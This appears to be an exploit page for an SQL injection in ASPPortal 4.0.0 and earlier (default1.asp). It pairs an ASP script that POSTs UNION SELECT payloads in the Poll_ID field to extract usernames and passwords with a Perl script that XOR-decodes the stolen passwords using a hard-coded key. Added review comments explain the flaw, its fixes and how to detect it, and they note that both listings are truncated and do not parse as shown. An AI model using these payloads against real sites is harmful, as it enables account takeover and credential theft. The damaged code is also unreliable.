
ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit



ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit
ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit



Perl Script Decode:

#!/usr/bin/perl
# AspPortal password decoder: companion script to the ASP listing on this page.
# Input: the encoded password value, entered at the prompt; the original note
# says that value is taken from the output of exploit.asp.
# Special thanks to: Nukedx, for the ASPPortal decrypter.
# Author: ajann
# NOTE(review): the listing is damaged as published here (the $apkey literal in
# decrypt() is cut off and the read in exploit() has no right-hand side), so it
# does not parse as shown.
# Entry point: calls exploit(). As printed, the condition assigns to @1 rather
# than comparing anything.
if(@1 = 1) { exploit(); }

# decrypt: XORs each character of the global $appass with the character at the
# same position in the fixed key $apkey, prints the result and exits.
# Takes no arguments; reads the globals $appass and $apkey and builds $appwd.
#
# Defensive takeaway: a position-wise XOR against a constant key is a reversible
# encoding, not a hash. If the application stores passwords this way (presumably
# with this same key; confirm against the ASPPortal source), anyone who can read
# the stored column recovers the plaintext. Store passwords with a salted, slow
# one-way hash instead, and reset credentials that were kept in this format.
sub decrypt ()
{
  $lp = length($appass);
# Hard-coded key. NOTE(review): the literal below is truncated on this page (no
# closing quote or semicolon), which is one reason the script does not parse.
$apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ 
  if ($lp == 0) { die("- An error occurued\r\n"); }
  for ($i = 0; $i < $lp ; $i++) {
    $f = $lp - $i - 1; # Index counted from the end: the loop walks from the last character to the first.
    $n = substr($apkey,$f,1);
    $l = substr($appass,$f,1);
    $appwd = chr(ord($n)^ord($l)).$appwd;
  }
  print "- Password decrypted as: $appwd\r\n";
  exit();
}
# exploit: prompts for the encoded password, stores it in the global $appass
# and hands over to decrypt(). Despite its name, this sub makes no network
# request; it only collects the input for the decoder.
# NOTE(review): the assignment to $kroo has no right-hand side on this page, so
# the statement does not parse as shown.
# NOTE(review): as printed, each of the four substitutions replaces a character
# with itself (chr(34) is the double quote, chr(60) is "<", chr(62) is ">",
# chr(32) is the space), so they have no effect on the input.
sub exploit () 
{
      print "Password?: ";
      $kroo = ;
      chop ($kroo);
      $appass = $kroo;
      $appass =~ s/(")/chr(34)/eg;
      $appass =~ s/(<)/chr(60)/eg;
      $appass =~ s/(>)/chr(62)/eg;
      $appass =~ s/( )/chr(32)/eg;
      decrypt();
    exit(); 
}



Exploit:


<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>

<%

' NOTE(review): the three directives above turn on response buffering, suppress
' VBScript runtime errors (On Error Resume Next) and set the script timeout to 100.
'==============================================================================================
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
'[Coded by   : ajann
'[Author   : ajann
'[Contact    : :(
'[ExploitName: exploit1.asp

'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'[Using : (translated from Turkish) Decode the retrieved password with the Perl script.
'[Using : (translated from Turkish) Against the Turkish-language version of the script this exploit cannot retrieve the data; it can be pulled manually.
'[Using : (translated from Turkish) I do not think anyone is low enough to do that.
'==============================================================================================
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke 

%>


ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit









ASPPortal <=v4.0.0(default1.asp) Remote SQL Injection Exploit

color="#FFFFFF">TARGET:Example:[http://x.com/path]

USER ID:Example:[User ID=1]

value="http://" size="25" style="background-color: #808080">
<%
' Proof-of-concept logic for the ASPPortal <= 4.0.0 default1.asp SQL injection
' described on this page.
' NOTE(review): the statements are run together on one physical line here and a
' string literal is broken across two lines, so this does not parse as VBScript
' as published.
'
' What the visible code does:
'   - reads the "islem" query-string value; "hata1", "hata2" and "hata3" each
'     print an error message, "get" runs the request logic;
'   - reads the form fields "id" and "text1", and redirects back with an error
'     when text1 is empty, contains "union", or does not contain "http://";
'   - sends two POST requests to text1 + "default1.asp" with Voteit=1 and a
'     Poll_ID value that carries a UNION SELECT against the users table (one
'     request for the username column, one for the password column);
'   - locates the "Poll Question:" marker in the first response only and uses
'     that offset to cut 14 characters out of both responses.
'
' Defender notes:
'   - Root cause (inferred from the request shape; confirm in default1.asp): the
'     Poll_ID form value appears to reach a SQL statement without validation.
'     Accept only an integer for Poll_ID and use parameterised queries, run the
'     site under a database account that cannot read the users table from the
'     poll code path, and upgrade past the affected versions.
'   - Detection: POST requests to default1.asp whose Poll_ID is not a plain
'     integer. Default IIS logs do not record POST bodies, so this needs a WAF,
'     a reverse proxy or application-level request logging.
'   - The password column exposed this way is stored in a reversible encoding
'     (see the Perl listing on this page), so affected sites should treat all
'     stored passwords as disclosed and reset them.
%>
<% islem = Request.QueryString("islem") If islem = "hata1" Then Response.Write "There is a problem! Please complete to the whole spaces" End If If islem = "hata2" Then Response.Write "There is a problem! Please right character use" End If If islem = "hata3" Then Response.Write "There is a problem! Add ""http://""" End If %> <% If islem = "get" Then string1="default1.asp" string2="default1.asp" cek= Request.Form("id") targettext = Request.Form("text1") arama=InStr(1, targettext, "union" ,1) arama2=InStr(1, targettext, "http://" ,1) If targettext="" Then Response.Redirect("exploit1.asp?islem=hata1") Else If arama>0 then Response.Redirect("exploit1.asp?islem=hata2") Else If arama2=0 then Response.Redirect("exploit1.asp?islem=hata3") Else %> <% target1 = targettext+string1 target2 = targettext+string2 Public Function take(come) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake .Open "POST" , come, FALSE .setRequestHeader "Content-Type", "application/x-www-form-urlencoded" .send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek take = .Responsetext End With SET objtake = Nothing End Function Public Function take1(come1) Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake1 .Open "POST" , come1, FALSE .setRequestHeader "Content-Type", "application/x-www-form-urlencoded" .send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek take1 = .Responsetext End With SET objtake1 = Nothing End Function get_username = take(target1) get_password = take1(target2) getdata=InStr(get_username,"Poll Question:
 " ) username=Mid(get_username,getdata+24,14) passwd=Mid(get_password,getdata+24,14) %>
ajann
             User Name:  <%=username%>
             User Password:  <%=passwd%>

<% End If End If End If End If Set objtake = Nothing %>

